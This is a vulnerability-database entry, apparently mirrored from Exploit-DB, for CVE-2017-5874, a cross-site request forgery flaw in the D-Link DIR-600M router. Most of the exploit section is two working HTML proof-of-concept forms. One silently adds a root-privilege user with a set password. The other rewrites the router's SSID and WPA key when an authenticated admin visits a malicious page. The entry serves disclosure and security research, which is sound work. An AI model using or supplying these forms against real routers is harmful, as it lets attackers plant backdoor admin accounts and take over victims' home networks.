ID
VAR-E-201702-0686
EDB ID
41299
TITLE
D-Link DIR-600M - Cross-Site Request Forgery - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
D-Link DIR-600M - Cross-Site Request Forgery.. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | d link | model: | dir-600m | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
# Exploit Title:D-link wireless router DIR-600M – Cross-Site Request Forgery (CSRF) vulnerability
# Google Dork:N/A
# Date: 07/02/2017
# Exploit Author:Ajay S. Kulal (www.twitter.com/ajay_kulal)
# Vendor Homepage:dlink.com
# Software Link:N/A
# Version:Hardware version: C1
Firmware version: 3.03
# Tested on:All Platforms
# CVE :CVE-2017-5874
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in the DIR-600M wireless router enables an attacker
to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)
Details:
=======
An attacker who lures a DIR-600M authenticated user to browse a malicious website
can exploit cross site request forgery (CSRF) to add new admin, change wifi password and to change other network settings.
Proof Of Concept code:
====================
1. Add new user with root access
<html>
<!-- CSRF PoC - by Ajay Kulal -->
<body>
<form action="http://192.168.0.1/form2userconfig.cgi" method="POST">
<input type="hidden" name="username" value="AK" />
<input type="hidden" name="privilege" value="2" />
<input type="hidden" name="newpass" value="dolphin" />
<input type="hidden" name="confpass" value="dolphin" />
<input type="hidden" name="adduser" value="Add" />
<input type="hidden" name="hiddenpass" value="" />
<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. changing wireless password
<html>
<!-- CSRF PoC - by Ajay Kulal -->
<body>
<form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
<input type="hidden" name="domain" value="1" />
<input type="hidden" name="hiddenSSID" value="on" />
<input type="hidden" name="ssid" value="Dravidian" />
<input type="hidden" name="band" value="10" />
<input type="hidden" name="chan" value="0" />
<input type="hidden" name="chanwid" value="1" />
<input type="hidden" name="txRate" value="0" />
<input type="hidden" name="method_cur" value="0" />
<input type="hidden" name="method" value="2" />
<input type="hidden" name="authType" value="2" />
<input type="hidden" name="length" value="1" />
<input type="hidden" name="format" value="2" />
<input type="hidden" name="defaultTxKeyId" value="1" />
<input type="hidden" name="key1" value="0000000000" />
<input type="hidden" name="pskFormat" value="0" />
<input type="hidden" name="pskValue" value="password123" />
<input type="hidden" name="checkWPS2" value="1" />
<input type="hidden" name="save" value="Apply" />
<input type="hidden" name="basicrates" value="15" />
<input type="hidden" name="operrates" value="4095" />
<input type="hidden" name="submit.htm?wlan_basic.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.6
CREDITS
Ajay S. Kulal
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 41299 | Trust: 1.6 |
| db: | EDBNET | id: | 90816 | Trust: 0.6 |
REFERENCES
| url: | https://www.exploit-db.com/exploits/41299/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 41299 |
| db: | EDBNET | id: | 90816 |
LAST UPDATE DATE
2022-07-27T09:27:09.044000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 41299 | date: | 2017-02-10T00:00:00 |
| db: | EDBNET | id: | 90816 | date: | 2017-02-10T00:00:00 |